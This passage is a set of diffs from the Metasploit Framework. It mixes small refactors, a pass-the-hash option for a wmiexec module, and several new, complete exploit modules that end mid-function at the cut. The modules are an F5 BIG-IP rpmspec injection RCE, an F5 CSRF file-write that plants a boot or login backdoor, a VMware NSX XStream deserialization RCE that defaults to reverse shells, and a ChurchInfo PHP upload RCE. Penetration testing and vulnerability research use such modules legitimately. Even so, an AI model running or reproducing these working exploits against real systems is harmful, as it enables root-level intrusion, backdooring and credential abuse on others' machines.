+    bit1   :gw
+    bit1   :gx
+    bit1   :ga
+    bit2   :reserved1
+    bit1   :ma
+    bit1   :as
+    def bit_names
+      names = []
+      names << :GENERIC_READ if self.gr != 0
+      names << :GENERIC_WRITE if self.gw != 0
+      names << :GENERIC_EXECUTE if self.gx != 0
+      names << :GENERIC_ALL if self.ga != 0
+      names << :MAXIMUM_ALLOWED if self.ma != 0
+      names << :ACCESS_SYSTEM_SECURITY if self.as != 0
+      names << :SYNCHRONIZE if self.sy != 0
+      names << :WRITE_OWNER if self.wo != 0
+      names << :WRITE_DACL if self.wd != 0
+      names << :READ_CONTROL if self.rc != 0
+      names << :DELETE if self.de != 0
+      names
+    end

    ALL  = MsDtypAccessMask.new({ gr: 1, gw: 1, gx: 1, ga: 1, ma: 1, as: 1, sy: 1, wo: 1, wd: 1, rc: 1, de: 1, protocol: 0xffff })
    NONE = MsDtypAccessMask.new({ gr: 0, gw: 0, gx: 0, ga: 0, ma: 0, as: 0, sy: 0, wo: 0, wd: 0, rc: 0, de: 0, protocol: 0 })
@@ -113,15 +128,15 @@ module Rex::Proto::MsDtyp
  class MsDtypAceNonObjectBody < BinData::Record
    endian :little

-    uint32             :access_mask
-    ms_dtyp_sid        :sid, byte_align: 4
+    ms_dtyp_access_mask :access_mask
+    ms_dtyp_sid         :sid, byte_align: 4
  end

  class MsDtypAceObjectBody < BinData::Record
    endian :little

-    uint32             :access_mask
-    struct             :flags do
+    ms_dtyp_access_mask :access_mask
+    struct              :flags do
      bit1 :reserved5
      bit1 :reserved4
      bit1 :reserved3
@@ -131,9 +146,9 @@ module Rex::Proto::MsDtyp
      bit1 :ace_inherited_object_type_present
      bit1 :ace_object_type_present
    end
-    ms_dtyp_guid       :object_type, onlyif: -> { flags.ace_object_type_present != 0x0 }
-    ms_dtyp_guid       :inherited_object_type, onlyif: -> { flags.ace_inherited_object_type_present != 0x0 }
-    ms_dtyp_sid        :sid, byte_align: 4
+    ms_dtyp_guid        :object_type, onlyif: -> { flags.ace_object_type_present != 0x0 }
+    ms_dtyp_guid        :inherited_object_type, onlyif: -> { flags.ace_inherited_object_type_present != 0x0 }
+    ms_dtyp_sid         :sid, byte_align: 4
  end

  # [2.4.4.2 ACCESS_ALLOWED_ACE](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/72e7c7ea-bc02-4c74-a619-818a16bf6adb)
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
  # are needed when there's no database
  spec.add_runtime_dependency 'metasploit-model'
  # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '2.0.99'
+  spec.add_runtime_dependency 'metasploit-payloads', '2.0.101'
  # Needed for the next-generation POSIX Meterpreter
  spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.20'
  # Needed by msfgui and other rpc components
@@ -53,7 +53,10 @@ class MetasploitModule < Msf::Auxiliary
  end

  def build_ace(sid)
-    Rex::Proto::MsDtyp::MsDtypAccessAllowedAce.new({
+    Rex::Proto::MsDtyp::MsDtypAce.new({
+      header: {
+        ace_type: Rex::Proto::MsDtyp::MsDtypAceType::ACCESS_ALLOWED_ACE_TYPE
+      },
      body: {
        access_mask: Rex::Proto::MsDtyp::MsDtypAccessMask::ALL,
        sid: sid
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Auxiliary
    acl.aces.each do |ace|
      ace_header = ace[:header]
      ace_body = ace[:body]
-      if ace_body['access_mask'].blank? # This won't work with Symbols for some reason, but will work with strings. Bite me.
+      if ace_body[:access_mask].blank?
        fail_with(Failure::UnexpectedReply, 'Encountered a DACL/SACL object without an access mask! Either data is an unrecognized type or we are reading it wrong!')
      end
      ace_string = Rex::Proto::MsDtyp::MsDtypAceType.name(ace_header[:ace_type])
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Auxiliary

      object_type = ace_body[:object_type]

-      if (ace_body[:access_mask] & CONTROL_ACCESS) == CONTROL_ACCESS && (object_type == CERTIFICATE_ENROLLMENT_EXTENDED_RIGHT || object_type == CERTIFICATE_AUTOENROLLMENT_EXTENDED_RIGHT)
+      if (ace_body.access_mask.protocol & CONTROL_ACCESS) != 0 && (object_type == CERTIFICATE_ENROLLMENT_EXTENDED_RIGHT || object_type == CERTIFICATE_AUTOENROLLMENT_EXTENDED_RIGHT)
        if ace_string.match(/DENIED/)
          flag_allowed_to_enroll = false
        elsif ace_string.match(/ALLOWED/)
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Auxiliary
      return
    end
    if res.code != 401
-      vprint_error("http://#{rhost}:#{rport} - Authorization not requested")
+      vprint_error("http://#{rhost}:#{rport}#{uri} - Authorization not requested")
      return
    end

@@ -12,9 +12,9 @@ import string
 import sys

 try:
-    from impacket.smbconnection import SMBConnection, SMB_DIALECT, \
-        SMB2_DIALECT_002, SMB2_DIALECT_21
-    from impacket.dcerpc.v5.dcomrt import DCOMConnection
+    from impacket.smbconnection import SessionError, SMBConnection, \
+        SMB_DIALECT, SMB2_DIALECT_002, SMB2_DIALECT_21
+    from impacket.dcerpc.v5.dcomrt import DCOMConnection, DCERPCSessionError
    from impacket.dcerpc.v5.dcom import wmi
    from impacket.dcerpc.v5.dtypes import NULL
 except ImportError:
@@ -41,8 +41,9 @@ metadata = {
        'COMMAND':    {'type': 'string', 'description': 'The command to execute', 'required': True},
        'OUTPUT':     {'type': 'bool',   'description': 'Get the output of the executed command', 'required': True, 'default': True},
        'SMBDomain':  {'type': 'string', 'description': 'The Windows domain to use for authentication', 'required': False, 'default': '.'},
-        'SMBPass':    {'type': 'string', 'description': 'The password for the specified username', 'required': True, 'default': None},
+        'SMBPass':    {'type': 'string', 'description': 'The password for the specified username', 'required': False, 'default': None},
        'SMBUser':    {'type': 'string', 'description': 'The username to authenticate as', 'required': True, 'default': None},
+        'HASHES':     {'type': 'string', 'description': 'The NTLM hash to use for authentication, format: LMHASH:NTHASH', 'required': False, 'default': None}
    },
    'notes': {
        'AKA': ['wmiexec.py']
@@ -51,7 +52,7 @@ metadata = {


 class WMIEXEC:
-    def __init__(self, command='', username='', password='', domain='', hashes=None, share=None,
+    def __init__(self, command='', username='', password=None, domain='', hashes=None, share=None,
                 noOutput=False):
        self.__command = command
        self.__username = username
@@ -65,25 +66,34 @@ class WMIEXEC:
        self.__doKerberos = False
        self.__kdcHost = None
        self.shell = None
+        if hashes is not None:
+            self.__lmhash, self.__nthash = hashes.split(':')

    def run(self, addr):
-        if self.__noOutput is False:
-            smbConnection = SMBConnection(addr, addr)
-            if self.__doKerberos is False:
-                smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
-            else:
-                smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,
-                                            self.__nthash, self.__aesKey, kdcHost=self.__kdcHost)
+        if not self.__password and not (self.__lmhash or self.__nthash):
+            logging.error("Either SMBPass or HASHES must be set, aborting...")
+            return

-            dialect = smbConnection.getDialect()
-            if dialect == SMB_DIALECT:
-                logging.info("SMBv1 dialect used")
-            elif dialect == SMB2_DIALECT_002:
-                logging.info("SMBv2.0 dialect used")
-            elif dialect == SMB2_DIALECT_21:
-                logging.info("SMBv2.1 dialect used")
-            else:
-                logging.info("SMBv3.0 dialect used")
+        if self.__noOutput is False:
+            try:
+                smbConnection = SMBConnection(addr, addr)
+                if self.__doKerberos is False:
+                    smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
+                else:
+                    smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,
+                                                self.__nthash, self.__aesKey, kdcHost=self.__kdcHost)
+
+                dialect = smbConnection.getDialect()
+                if dialect == SMB_DIALECT:
+                    logging.info("SMBv1 dialect used")
+                elif dialect == SMB2_DIALECT_002:
+                    logging.info("SMBv2.0 dialect used")
+                elif dialect == SMB2_DIALECT_21:
+                    logging.info("SMBv2.1 dialect used")
+                else:
+                    logging.info("SMBv3.0 dialect used")
+            except SessionError as exc:
+                logging.error(str(exc))
        else:
            smbConnection = None

@@ -102,8 +112,8 @@ class WMIEXEC:
                self.shell.onecmd(self.__command)
            else:
                self.shell.cmdloop()
-        except (Exception, KeyboardInterrupt) as e:
-            logging.error(str(e))
+        except (DCERPCSessionError, Exception, KeyboardInterrupt) as exc:
+            logging.error(str(exc))

        if smbConnection is not None:
            smbConnection.logoff()
@@ -131,8 +141,8 @@ def run(args):
        return

    _msf_impacket.pre_run_hook(args)
-    executer = WMIEXEC(args['COMMAND'], args['SMBUser'], args['SMBPass'], args['SMBDomain'],
-                        share='ADMIN$', noOutput=args['OUTPUT'] != 'true')
+    executer = WMIEXEC(args['COMMAND'], args['SMBUser'], args['SMBPass'], args['SMBDomain'], 
+                        hashes=args['HASHES'], share='ADMIN$', noOutput=args['OUTPUT'] != 'true')
    executer.run(args['rhost'])

 if __name__ == "__main__":
@@ -865,6 +865,8 @@ class MetasploitModule < Msf::Auxiliary
      print_error("#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
+    rescue SNMP::ParseError
+      print_error("#{ip} Encountered an SNMP parsing error while trying to enumerate the host.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
@@ -49,6 +49,8 @@ class MetasploitModule < Msf::Auxiliary
        )
      end

+    rescue SNMP::ParseError
+      print_error("#{ip} Encountered an SNMP parsing error while trying to enumerate the host.")
    rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion
    rescue ::Interrupt
      raise $!
@@ -65,6 +65,8 @@ class MetasploitModule < Msf::Auxiliary
        type: 'snmp.users',
        data: users
      )
+    rescue SNMP::ParseError
+      print_error("#{ip} Encountered an SNMP parsing error while trying to enumerate the host.")
    rescue ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion
      # too noisy for a scanner
    ensure
@@ -0,0 +1,126 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'F5 BIG-IP iControl Authenticated RCE via RPM Creator',
+        'Description' => %q{
+          This module exploits a newline injection into an RPM .rpmspec file
+          that permits authenticated users to remotely execute commands.
+
+          Successful exploitation results in remote code execution
+          as the root user.
+        },
+        'Author' => [
+          'Ron Bowes' # Discovery, PoC, and module
+        ],
+        'References' => [
+          ['CVE', '2022-41800'],
+          ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],
+          ['URL', 'https://support.f5.com/csp/article/K97843387'],
+          ['URL', 'https://support.f5.com/csp/article/K13325942'],
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2022-11-16', # Vendor advisory
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => true,
+        'Targets' => [
+          [ 'Default', {} ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.
+          'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION], # One at a time
+          'SideEffects' => [
+            IOC_IN_LOGS,
+            ARTIFACTS_ON_DISK
+          ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('HttpUsername', [true, 'iControl username', 'admin']),
+        OptString.new('HttpPassword', [true, 'iControl password', ''])
+      ]
+    )
+  end
+
+  def exploit
+    # The RPM name is based on these, so we need these to delete the RPM file after
+    name = rand_text_alphanumeric(5..10)
+    version = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}"
+    release = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}"
+
+    vprint_status('Creating an .rpmspec file on the target...')
+    result = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/rpm-spec-creator'),
+      'ctype' => 'application/json',
+      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
+      'data' => {
+        'specFileData' => {
+          'name' => name,
+          'srcBasePath' => '/tmp',
+          'version' => version,
+          'release' => release,
+          # This is the injection - add newlines then a '%check' section
+          'description' => "\n\n%check\n#{payload.encoded}\n",
+          'summary' => rand_text_alphanumeric(5..10)
+        }
+      }.to_json
+    })
+
+    fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result
+    fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401
+    fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code != 200
+
+    json = result&.get_json_document
+    fail_with(Failure::UnexpectedReply, "Server didn't return valid JSON") unless json
+
+    file_path = json['specFilePath']
+    fail_with(Failure::UnexpectedReply, "Server didn't return a specFilePath") unless file_path
+    vprint_status("Created spec file: #{file_path}")
+    register_file_for_cleanup(file_path)
+
+    # We can also use `exit 1` in the %check function to prevent this file
+    # from being created, rather than cleaning it up.. but that seems noisier?
+    # Neither option gets logged so /shrug
+    register_file_for_cleanup("/var/config/rest/node/tmp/RPMS/noarch/#{name}-#{version}-#{release}.noarch.rpm")
+
+    vprint_status('Building the RPM to trigger the payload...')
+    result = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/build-package'),
+      'ctype' => 'application/json',
+      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
+      'data' => {
+        'state' => {},
+        'appName' => rand_text_alphanumeric(5..10),
+        'packageDirectory' => '/tmp',
+        'specFilePath' => file_path
+      }.to_json
+    })
+    fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result
+    fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401
+    fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code < 200 || result.code > 299
+  end
+end
@@ -0,0 +1,166 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'F5 BIG-IP iControl CSRF File Write SOAP API',
+        'Description' => %q{
+          This module exploits a cross-site request forgery (CSRF) vulnerability
+          in F5 Big-IP's iControl interface to write an arbitrary file to the
+          filesystem.
+
+          While any file can be written to any location as root, the
+          exploitability is limited by SELinux; the vast majority of writable
+          locations are unavailable. By default, we write to a script that
+          executes at reboot, which means the payload will execute the next time
+          the server boots.
+
+          An alternate target - Login - will add a backdoor that executes next
+          time a user logs in interactively. This overwrites a file,
+          but we restore it when we get a session
+
+          Note that because this is a CSRF vulnerability, it starts a web
+          server, but an authenticated administrator must visit the site, which
+          redirects them to the target.
+        },
+        'Author' => [
+          'Ron Bowes' # Discovery, PoC, and module
+        ],
+        'References' => [
+          ['CVE', '2022-41622'],
+          ['URL', 'https://github.com/rbowes-r7/refreshing-soap-exploit'],
+          ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],
+          ['URL', 'https://support.f5.com/csp/article/K97843387'],
+          ['URL', 'https://support.f5.com/csp/article/K94221585'],
+          ['URL', 'https://support.f5.com/csp/article/K05403841'],
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2022-11-16', # Vendor advisory
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Type' => :unix_cmd,
+        'Privileged' => true,
+        'Targets' => [
+          [ 'Restart', {}, ],
+          [ 'Login', {}, ],
+          [ 'Custom', {}, ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            IOC_IN_LOGS,
+            ARTIFACTS_ON_DISK
+          ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGET_HOST', [true, 'The IP or domain name of the target F5 device']),
+        OptString.new('TARGET_URI', [true, 'The URI of the SOAP API', '/iControl/iControlPortal.cgi']),
+        OptBool.new('TARGET_SSL', [true, 'Use SSL for the upstream connection?', true]),
+        OptString.new('FILENAME', [false, 'The file on the target to overwrite (for "custom" target) - note that SELinux prevents overwriting a great deal of useful files']),
+      ]
+    )
+  end
+
+  def on_request_uri(socket, _request)
+    if datastore['TARGET'] == 0 # restart
+      filename = '/shared/f5_update_action'
+      file_payload = <<~EOT
+        UpdateAction
+        https://localhost/success`#{payload.encoded}`
+        https://localhost/error
+        0
+        0
+        0
+        0
+      EOT
+
+      # Delete the logfile if we get a session
+      register_file_for_cleanup('/var/log/f5_update_checker.out')
+
+      print_status("Redirecting the admin to overwrite #{filename}; if successful, your session will come approximately 2 minutes after the target is rebooted")
+    elsif datastore['TARGET'] == 1 # login
+      filename = '/var/run/config/timeout.sh'
+      file_payload = "#{payload.encoded} & disown;"
+
+      # Delete the backdoored file if we get a session.. this will be fixed at
+      # next reboot
+      register_file_for_cleanup('/var/run/config/timeout.sh')
+
+      print_status("Redirecting the admin to overwrite #{filename}; if successful, your session will come the next time a user logs in interactively")
+    else # Custom
+
+      filename = datastore['FILENAME']
+      file_payload = payload.encoded
+
+      print_status("Redirecting the admin to overwrite #{filename} with the payload")
+    end
+
+    # Build the SOAP request that'll be sent to the target server
+    csrf_payload = %(
+    <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:con="urn:iControl:System/ConfigSync">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <con:upload_file soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+        <file_name xsi:type="xsd:string">#{filename}</file_name>
+         <file_context xsi:type="urn:System.ConfigSync.FileTransferContext" xmlns:urn="urn:iControl">
+            <!--type: Common.OctetSequence-->
+            <file_data xsi:type="urn:Common.OctetSequence">#{Rex::Text.encode_base64(file_payload)}</file_data>
+            <chain_type xsi:type="urn:Common.FileChainType">FILE_FIRST_AND_LAST</chain_type>
+         </file_context>
+      </con:upload_file>
+   </soapenv:Body>
+</soapenv:Envelope>
+    )
+
+    # Build the target URL
+    target_url = "#{datastore['TARGET_SSL'] ? 'https' : 'http'}://#{datastore['TARGET_HOST']}#{datastore['TARGET_URI']}"
+
+    # Build the HTML payload that'll send the SOAP request via the user's browser
+    html_payload = %(
+<html>
+    <body>
+        <form action="#{target_url}" method="POST" enctype="text/plain">
+            <textarea id="payload" name="&lt;!--">--&gt;#{Rex::Text.html_encode(csrf_payload)}</textarea>
+        </form>
+        <script>
+            document.forms[0].submit();
+        </script>
+    </body>
+</html>
+    )
+
+    # Send the HTML to the browser
+    send_response(socket, html_payload, { 'Content-Type' => 'text/html' })
+  end
+
+  def exploit
+    # Sanity check
+    if datastore['TARGET'] == 2 && (!datastore['FILENAME'] || datastore['FILENAME'].empty?)
+      fail_with(Failure::BadConfig, 'For custom targets, please provide the FILENAME')
+    end
+
+    print_good('Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below')
+    super
+  end
+end
@@ -0,0 +1,154 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMware NSX Manager XStream unauthenticated RCE',
+        'Description' => %q{
+          VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.
+          VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.
+          Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),
+          a malicious actor can get remote code execution in the context of 'root' on the appliance.
+          VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13
+          are vulnerable to Remote Command Injection.
+
+          This module exploits the vulnerability to upload and execute payloads gaining root privileges.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y', # metasploit module author
+          'Sina Kheirkhah', # Security researcher (Source Incite)
+          'Steven Seeley' # Security researcher (Source Incite)
+        ],
+        'References' => [
+          ['CVE', '2021-39144'],
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0027.html'],
+          ['URL', 'https://kb.vmware.com/s/article/89809'],
+          ['URL', 'https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html'],
+          ['URL', 'https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144']
+        ],
+        'DisclosureDate' => '2022-10-25',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix (In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :in_memory,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'curl', 'printf' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def check_nsx_v_mgr
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login.jsp')
+    })
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
+  end
+
+  def execute_command(cmd, _opts = {})
+    b64 = Rex::Text.encode_base64(cmd)
+    random_uri = rand_text_alphanumeric(4..10)
+    xml_payload = <<~XML
+      <sorted-set>
+        <string>foo</string>
+        <dynamic-proxy>
+          <interface>java.lang.Comparable</interface>
+          <handler class="java.beans.EventHandler">
+            <target class="java.lang.ProcessBuilder">
+              <command>
+                <string>bash</string>
+                <string>-c</string>
+                <string>echo #{b64} &#x7c; base64 -d &#x7c; bash</string>
+              </command>
+            </target>
+            <action>start</action>
+          </handler>
+        </dynamic-proxy>
+      </sorted-set>
+    XML
+
+    return send_request_cgi({
+      'method' => 'PUT',
+      'ctype' => 'application/xml',
+      'uri' => normalize_uri(target_uri.path, 'api', '2.0', 'services', 'usermgmt', 'password', random_uri),
+      'data' => xml_payload
+    })
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
+  end
+
+  # Checking if the target is potential vulnerable checking the http title "VMware Appliance Management"
+  # that indicates the target is running VMware NSX Manager (NSX-V)
+  # All NSX Manager (NSX-V) unpatched versions, except for 6.4.14, are vulnerable
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    res = check_nsx_v_mgr
+    return CheckCode::Unknown('No response received from the target!') unless res
+
+    html = res.get_html_document
+    html_title = html.at('title')
+    if html_title.nil? || html_title.text != 'VMware Appliance Management'
+      return CheckCode::Safe('Target is not running VMware NSX Manager (NSX-V).')
+    end
+
+    CheckCode::Appears('Target is running VMware NSX Manager (NSX-V).')
+  end
+
+  def exploit
+    case target['Type']
+    when :in_memory
+      print_status("Executing #{target.name} with #{payload.encoded}")
+      execute_command(payload.encoded)
+    when :linux_dropper
+      print_status("Executing #{target.name}")
+      execute_cmdstager
+    end
+  end
+end
@@ -310,7 +310,7 @@ class MetasploitModule < Msf::Exploit::Local
          echo \"success\";
          break;
        fi;
-      done;
+      done
    SCRIPT
               .gsub(/\s+/, ' ')) =~ /success/
  end
@@ -361,7 +361,7 @@ class MetasploitModule < Msf::Exploit::Local
  end

  def execute_payload(fname)
-    cmd_exec("echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -S #{fname}\"")
+    cmd_exec("echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -Sb #{fname}\"")
  end

  def exploit
@@ -402,4 +402,13 @@ class MetasploitModule < Msf::Exploit::Local
      print_warning("Unable to remove user: #{datastore['USERNAME']}, created during the running of this module")
    end
  end
+
+  def on_new_session(client)
+    # Because we deleted the user directory, a meterp shell will be unusable until we chdir somewhere that exists
+    # So let's just use the WritableDir that must exist, given its use earlier
+    if !session.nil? && (client.type == 'meterpreter')
+      client.core.use('stdapi')
+      client.fs.dir.chdir(datastore['WritableDir'])
+    end
+  end
 end
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Local

    loginctl_output = cmd_exec('loginctl --no-ask-password show-session "$XDG_SESSION_ID" | grep Remote')
    if loginctl_output =~ /Remote=yes/
-      print_warning 'This is exploit requires a valid policykit session (it cannot be executed over ssh)'
+      print_warning 'This exploit requires a valid policykit session (it cannot be executed over ssh)'
      return CheckCode::Safe
    end

@@ -0,0 +1,242 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ChurchInfo 1.2.13-1.3.0 Authenticated RCE',
+        'Description' => %q{
+          This module exploits the logic in the CartView.php page when crafting a draft email with an attachment.
+          By uploading an attachment for a draft email, the attachment will be placed in the /tmp_attach/ folder of the
+          ChurchInfo web server, which is accessible over the web by any user. By uploading a PHP attachment and
+          then browsing to the location of the uploaded PHP file on the web server, arbitrary code
+          execution as the web daemon user (e.g. www-data) can be achieved.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'm4lwhere <m4lwhere@protonmail.com>' ],
+        'References' => [
+          ['URL', 'http://www.churchdb.org/'],
+          ['URL', 'http://sourceforge.net/projects/churchinfo/'],
+          ['CVE', '2021-43258']
+        ],
+        'Platform' => 'php',
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' => [['Automatic Targeting', { 'auto' => true }]],
+        'DisclosureDate' => '2021-10-30', # Reported to ChurchInfo developers on this date
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => ['CRASH_SAFE'],
+          'Reliability' => ['REPEATABLE_SESSION'],
+          'SideEffects' => ['ARTIFACTS_ON_DISK', 'IOC_IN_LOGS']
+        }
+      )
+    )
+    # Set the email subject and message if interested
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [true, 'Username for ChurchInfo application', 'admin']),
+        OptString.new('PASSWORD', [true, 'Password to login with', 'churchinfoadmin']),
+        OptString.new('TARGETURI', [true, 'The location of the ChurchInfo app', '/churchinfo/']),
+        OptString.new('EMAIL_SUBJ', [true, 'Email subject in webapp', 'Read this now!']),
+        OptString.new('EMAIL_MESG', [true, 'Email message in webapp', 'Hello there!'])
+      ]
+    )
+  end
+
+  def check
+    if datastore['SSL'] == true
+      proto_var = 'https'
+    else
+      proto_var = 'http'
+    end
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'Default.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'Proto' => proto_var,
+        'Path' => target_uri.path
+      }
+    )
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to a request to its login page!')
+    end
+
+    # Check if page title is the one that ChurchInfo uses for its login page.
+    if res.body.match(%r{<title>ChurchInfo: Login</title>})
+      print_good('Target is ChurchInfo!')
+    else
+      return CheckCode::Safe('Target is not running ChurchInfo!')
+    end
+
+    # Check what version the target is running using the upgrade pages.
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_14To1_3_0.php'),
+      'method' => 'GET'
+    )
+
+    if res && (res.code == 500 || res.code == 200)
+      return CheckCode::Vulnerable('Target is running ChurchInfo 1.3.0!')
+    end
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_13To1_2_14.php'),
+      'method' => 'GET'
+    )
+
+    if res && (res.code == 500 || res.code == 200)
+      return CheckCode::Vulnerable('Target is running ChurchInfo 1.2.14!')
+    end
+
+    res = send_request_cgi(
